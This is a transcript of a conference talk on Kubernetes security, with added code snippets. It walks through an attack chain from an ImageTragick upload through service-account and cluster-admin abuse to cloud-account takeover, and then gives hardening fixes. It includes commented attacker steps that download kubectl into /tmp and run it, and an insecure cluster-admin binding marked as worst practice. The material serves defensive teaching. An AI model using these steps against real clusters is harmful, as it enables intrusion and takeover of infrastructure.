Thomas Fricke: Thank you very much for the invitation. So, second talk tomorrow – thank you – um, today. This is my background: more or less, I do Kubernetes security and critical infrastructure. I founded several companies, and now my main focus is on Kubernetes security. There is this rabbit hole of Kubernetes: if you look deeper into it, you should be a little bit scared, and I want to explain why. The first approach is the application, and the application normally runs in containers. And the containers – which is not really well known – have access to service accounts in Kubernetes, which is one of the major flaws in Kubernetes at the moment. If you take over the service account, it might be that you can take over a cluster. And if you can take over a cluster, you might take over a node, and then your entire cloud service account – which is the work of somebody else, whom I will mention later in these slides. So let's look at what happens:
So, the target is: I have an application exposed to the internet, and I want to own the entire cluster from the outside. The application might be vulnerable. Examples? Yeah, lots of them. One example I want to present is ImageTragick. Normally, you should not use eval or exec statements in any framework – be it PHP, Node.js, or any other framework – and execute commands in the context of your application, because something can go wrong, and developers are responsible for this. Let's
see what it looks like. This is the attack model, based on a real attack. I thought it was old and had been fixed in 2016, but now there was a new overview by Emil Lerner, who again showed that yes, you can exploit this attack in current versions of ImageMagick. So, it works. ImageMagick is used for uploading images: you convert the image to a different format, scale the size – and if something is wrong with this image, you can own the entire container. This also works for non-containerized applications, if you have a server running something with ImageMagick on it. Please be careful. OK. If we have mastered this step, the next step is: yes, we want access to the service account. And this is enabled by default in Kubernetes. So, you have a Kubernetes design flaw, because your service account is exposed to the container the application runs in.
The next step of an attacker is the installation of additional software. So, you want to take over: you need a curl, a kubectl, and a chmod, and then you are the owner of the service account and can actually run commands by uploading pictures via ImageTragick. Responsible for this flaw is the image creator. Let's see what else can happen. To get total control, you also need a role binding to the cluster-admin role.
This is not enabled by default, but the internet is always good for bad advice. So if you copy the installation requirements or recommendations from the internet, somebody else might take over the entire cluster. Let's look deeper into it. The worst practice here is what you can see in the Elastic installation recommendation: they just mention that they have a newer version, but they use cluster-admin permissions here to install Elasticsearch in your Kubernetes cluster. So they recommend it, and a lot of other applications also have this in their installation requirements – it's a little bit outdated, but quite common. Never, ever do this, please.
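The worst-practice pattern from such installation guides boils down to a manifest like this sketch (the binding name is illustrative): it binds the default service account – whose token is mounted into pods automatically – to the built-in cluster-admin role.

```yaml
# DO NOT apply this -- worst-practice sketch of the advice criticized above.
# Binding the automatically mounted default service account to cluster-admin
# hands cluster-admin to every pod in the namespace.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: give-away-the-cluster        # illustrative name
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin                # built-in superuser role
subjects:
- kind: ServiceAccount
  name: default                      # mounted into pods by default
  namespace: default
```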
It can also come with Helm charts, so you have Helm charts where the cluster-admin role is included. Here you see it was in Apache Heron, which is an Apache project, and it uses the cluster-admin role, so with a helm install you might be affected by this flaw too. So with these four steps, which effectively are three steps, you have a cluster application exposed, and through that path you can take over the entire cluster from the outside and do anything the cluster-admin role can do. Effectively, this cluster-admin role binding is like a doormat attack: you have the best cryptography and the most expensive locks on one side, and then you put the key under the doormat or under the flowerpot at the door, or something like that. This is not really what you want. I can do an example walkthrough which shows how it works. So, I've published all my training notebooks on GitHub. Here's how you can build this outdated ImageTragick version in OpenShift. So, I use CRC, the CodeReady Containers version. It's based on the ImageTragick proof of concept by Mike Williams. And here you run it and create a vulnerable image. It's a little bit lengthy – it's compiled inside and so on, so you don't get the full version here, which is the reason I don't show it – but effectively, at the end, you have a vulnerable application in a container, internally, in OpenShift. And that's exactly what we need
to run the application. Here is the exploit. The exploit starts with the deployment of this container, which is standard Kubernetes. Here, "oc" is like kubectl, so you get an overview. Additionally, in OpenShift you have a very simple way of creating a route, which is connected to a hostname, and then you can upload via that hostname. You expose the deployment, you expose the service which is created, you finally expose the route, and then you have access.
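These exposure steps can be sketched with standard oc commands (a sketch that needs a running OpenShift cluster; all resource names and the image URL are illustrative, not from the talk):

```shell
# Deploy the vulnerable container, then expose it step by step.
oc create deployment imagetragick --image=registry.example.com/imagetragick:poc
oc expose deployment imagetragick --port=80   # creates the service
oc expose service imagetragick                # creates the route with a hostname
oc get route imagetragick                     # shows the URL to upload images to
```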
The next step is that you get this route, and then you have a URL which you can use. In a full demo, I would simply call this URL and then upload images here. I've created these files, which are valid PostScript files, but you see that at the end there is a shell command.
And here, because there's a curl in the container, I can download a version of kubectl. Effectively, the containers – especially the Red Hat containers – are not as vulnerable as others, but you always have a writable /tmp, which is enough to deploy some software. So we curl kubectl from the internet, put it into /tmp, and then we use a simple chmod command to make kubectl executable. So now we can call kubectl commands from inside an image. That is the death knell, more or less, exactly at the right place. We have a working exploit now – and warning: it might already work like this in older versions of Kubernetes.
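The in-container steps just described can be sketched as follows. The commented lines are the attacker's actual pattern (the download URL is illustrative); the last three lines are a harmless local stand-in showing why a writable /tmp plus chmod is all it takes:

```shell
# What the attacker runs inside the container (sketch, URL illustrative):
#   curl -Lo /tmp/kubectl https://dl.k8s.io/release/v1.28.0/bin/linux/amd64/kubectl
#   chmod +x /tmp/kubectl
#   /tmp/kubectl get pods      # talks to the API with the mounted token
# Harmless local stand-in: any writable directory plus chmod yields execution.
cp /bin/echo /tmp/not-kubectl    # "download" a binary into writable /tmp
chmod +x /tmp/not-kubectl        # activate it, exactly as in the exploit
/tmp/not-kubectl hello-attacker  # runs it: prints "hello-attacker"
```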
In newer versions, we additionally need a pill of poison, and this is exactly the cluster role binding to the cluster-admin role, which needs to be in place so that we have full access from the outside. And if we do this, and expose our cluster-admin account through the same service account which is already exposed inside the container, we can execute commands with this kubectl: we can create deployments by uploading pictures. Which is exactly what you never want – but an attacker now has full access to your cluster by simply uploading prepared malicious pictures.
So this is an example here: you can create and delete containers and deployments this way; effectively, you can do everything. And again, this is the problem here from the application side: if you have a vulnerable version of ImageMagick, you can include commands, and you can definitely install software on the Kubernetes server side. There are several attempts to fix this. For example, you can use better images, like Red Hat does – this is the Red Hat health index, which is quite good – but effectively these images only have the advantage that you don't run anything as root. You run the same things as another user ID, and that same user is allowed to write to the /tmp directory; effectively, you don't need root for installing software. So the container also followed good practice – no root inside, an immutable root file system – but the curl, which is completely unnecessary, was also deployed; we had write access to /tmp; we had a chmod. And the first thing
you would prevent is all the stuff I'm doing here. If you don't learn anything else from this talk, please go look into your service accounts and try to disable the automountServiceAccountToken feature: all service accounts which are not running operators don't need this service account token mounted. If you have an operator, it might be broken now – and the setting can be overridden in the Pod definition – but effectively, this entire example would not work without this service account token. So, we have fixed that. We cannot fix the application, because it is something somebody else is creating for us, and we might even have a flaw which is not known yet, so there might be a zero-day. The next thing
we must prevent is the installation of software. Fix the images: use really immutable images, /tmp only if you need it – the PID is 1 anyway. OK, you might have some variable data, but you should use containers built from scratch: no curl, no wget. This also affects Red Hat UBIs, and most of the standard images have this flaw: you have a full operating system inside, with all the tools you like. But this is not your territory – it's just a toolbox for the attacker. So please run only trusted images, build your own images, and build them from scratch.
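The from-scratch pattern can be sketched as a multi-stage build like this (a sketch, not the talk's actual repository: `harden.sh`, the stage name, and the paths are hypothetical, assuming a script that collects the binary, its ldd-resolved libraries, and its config into /tmp/harden):

```dockerfile
# Stage 1: a full image in which a harden script collects only what nginx needs
FROM nginx:alpine AS builder
COPY harden.sh /harden.sh          # hypothetical script collecting the files
RUN sh /harden.sh                  # copies binary, ldd-resolved libs, config,
                                   # and log directories into /tmp/harden

# Stage 2: start from an empty image and take only the collected files
FROM scratch
COPY --from=builder /tmp/harden/ /
USER 101                           # run unprivileged, no root inside
ENTRYPOINT ["/usr/sbin/nginx", "-g", "daemon off;"]
```

The scratch stage contains no shell, no curl, and no package manager, so the software-installation step of the attack has nothing to work with.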
This is my example, which I have also uploaded to GitHub, of how to harden the container; it is based on nginx:alpine. nginx:alpine is normally a very small container, but you can do more. You can use the script in this repository to get only the tools you need. This is not statically linked, because the original nginx is not statically linked, but it's very close. This means you only positively install the software you need. It is dynamically linked – therefore we use ldd to extract all the dynamically linked libraries, and then all the configuration files which are necessary: the passwd and group files, OK, some licenses, and the share directory. We need some directories for logging, and then you can install it from scratch, because this script installs everything into a directory /tmp/harden. With this multi-stage build, you can install all you need from /tmp/harden; the next container is based on scratch, and you can use nginx more or less the same way you would use an application which is statically linked. So now we have created a hardened image without kubectl or curl inside. So, we are
much closer to a secure application. The next thing is the role binding to the cluster-admin role: don't do this. If something in your application goes wrong, you have additional measures you can take to prevent the application from breaking out of the container. You can separate the internet exposure of services or ingresses in Kubernetes from privileged operations. So you have node settings – Elasticsearch is doing a lot of these things; well, "a lot" is really not true – such as doing a sysctl. Some applications have hostPaths, or have a connection to the host's inter-process communication, which is not necessary if you have exposed them; so separate the applications which need this from the applications which don't. So, cluster-admin should be more or less restricted to very privileged operators. And by the way, Argo is also a
very privileged operator. Don't run Argo on a Kubernetes cluster in a security-critical environment, because I've seen that Argo also binds to cluster-admin. It doesn't mean that Argo is unsafe by default, but it's a very complex application, and I would definitely run it in a separate cluster, not in the critical
cluster. And what does an architecture fix look like? Here you have the lifecycle of a Pod, with time going from left to right. Here you see that once the container is ready, it can be accessed from the internet. And if you do something from the init system, like a sysctl, please do it inside a container which is not connected to the internet – use it like the pause container, limited and restricted, and not really connected to the network. So, this is something which covers the architecture.
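Two of the fixes above can be combined in one pod spec sketch (names and the chosen sysctl are illustrative): the service account token is not mounted at all, and the privileged sysctl runs in an init container that finishes before the pod can receive any traffic, while the serving container stays unprivileged.

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: web-hardened                  # illustrative name
spec:
  automountServiceAccountToken: false # the fix that breaks the whole exploit chain
  initContainers:
  - name: set-sysctl                  # privileged work before any traffic arrives
    image: busybox:1.36
    command: ["sysctl", "-w", "net.core.somaxconn=1024"]  # illustrative sysctl
    securityContext:
      privileged: true
  containers:
  - name: web                         # the only container exposed to the internet
    image: nginx:alpine
    securityContext:
      readOnlyRootFilesystem: true
      allowPrivilegeEscalation: false
```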
Additionally, I already mentioned the network policy here, which will come later. So, this is our threat matrix: we have exposed and non-exposed services, and we have unprivileged and privileged things. The dangerous ones are the privileged ones which are exposed. But normally, you only have an exposed privileged application if you have an IDE running in Kubernetes – which is not what I would like to see in critical infrastructure – something like RStudio, or a web UI to a GitOps framework. Normally, you only have a web application. And what should not be exposed under normal conditions: operators, sysctls, build systems, host operators, and so on. If you do this, it's virtually impossible to own the cluster. You should do all three, because if you have security in depth, you can make a mistake on one of these levels, and the other levels keep you from being exploited. You can even do more
isolation. On the network side, you have network policies for egress; on the node side, you can activate seccomp, gVisor, and the common frameworks SELinux and AppArmor. You can use Pod Security Policies or, in the future, the Open Policy Agent to prevent the node from being hacked. For identity and access management, you should use individual service accounts for all your tasks, so you have a lot of roles, and you should use role-based access control to check this. OK, but I promised: yes, we can
go even deeper, and this needs a little help from your cloud administrator. Here is the example from Nico Meisenzahl, who does a very similar demo on hijacking Kubernetes, and he's doing it, obviously, in one of the clouds. What he has found out is that you can get access to the azure.json file, which has user-assigned identities. These are not the Kubernetes identities; this is the Azure identity. You can get a token, a subscription, and a resource group, and then you can use a curl command with this token to change things via the API on this resource group within this subscription. So, you might be able
to hack your node with a privileged container and then take over your cloud account. And he told me that this is also true for the other clouds, so something similar might even work in AWS and GCP. So please also protect your cloud account. Understand your identity and access management in the cloud – at least someone in the team should understand it – and also limit the underlying account to the bare minimum. It might even be a good idea to block access to metadata addresses like 169.254.something. And the other clouds, as I already mentioned, might also be affected. And my call to the cloud providers is: don't deliver account data in containers or on nodes. This is not necessary. Yes, it's very comfortable – just as the service account token is very comfortable for running operators – but it's a major security flaw, and it might be that you lose all your accounts and data. Conclusion: we have a full attack chain from the application to
the cloud account. And it's your task to prevent it and fix it. This is called shared responsibility: the cloud providers effectively only care for the infrastructure, but not really for the security in your cloud. This is your task. OK, thank you for your attention. I hope it was interesting. Please ask your questions. And now I'm open for the Q&A.
Applause
Herald: Thank you for the talk. Is this working? Yeah. So, do we have any questions from the internet? I don't see any coming in so far, but we are, I think, usually a bit ahead, so I'll ask one:
Q: What do you think – whose responsibility is it, mainly, to fix these insecurities? Do you think this can be fixed by better defaults in these infrastructures and configuration files? Is this to be fixed by better tutorials and better education for the DevOps engineers? What is the main point of responsibility?
A: I would definitely prefer to have secure default installations. But then you have this shared responsibility in the contracts: from a certain point on, you are responsible for the security of the account. And we have seen this complexity, because this might be 20 steps; every step is very simple and looks very harmless, but all the steps together might create a full exploit of a cloud. So this must be overseen, and it's very hard for developers who are cloud native and focused on the application to have an overview of the security. Developers now have 10 or 100 times more code on the hard disk than ten years before, and this means developers are not really able to fully judge what is going on in terms of security. When developers talk about security, either they are specialized in it, or they have not seen things like this. What I normally notice is that developers are not aware of these problems.
Q: OK. And what do you think we can do about the complexity? Do you think we need better education for people to actually understand the systems? Or is there a way in cloud infrastructures to reduce the complexity?
A: Better education – and do all the simple fixes. These are five steps, and the fixes are also very simple. You have to check them, and then you need a tool, because you might have 20 clusters like this, and every cluster has 20 applications, so this might get quite complicated. So you need tools for an overview, and in the training material you see examples of how you can check your Kubernetes clusters for exploits like this.
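As a starting point for such a check, two one-liners in this spirit (a sketch: they need cluster access and jq, and only cover the two flaws from the talk) list who is bound to cluster-admin and which service accounts still automount their token:

```shell
# Who is bound to cluster-admin? (subjects of every cluster-admin binding)
kubectl get clusterrolebindings -o json \
  | jq -r '.items[] | select(.roleRef.name == "cluster-admin") | .subjects'

# Service accounts that do not opt out of token automounting
kubectl get serviceaccounts -A -o json \
  | jq -r '.items[] | select(.automountServiceAccountToken != false)
           | "\(.metadata.namespace)/\(.metadata.name)"'
```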
Herald: OK, thank you very much. Thanks
for being here. We will continue in about
half an hour with the next talk, then
again in German. Thanks.
Thomas: Thank you very much. Applause
Outro: Everything is licensed under CC BY
4.0. And it is all for the community, to
the unknown and for everyone.
Subtitles created by c3subtitles.de
in the year 2022. Join, and help us!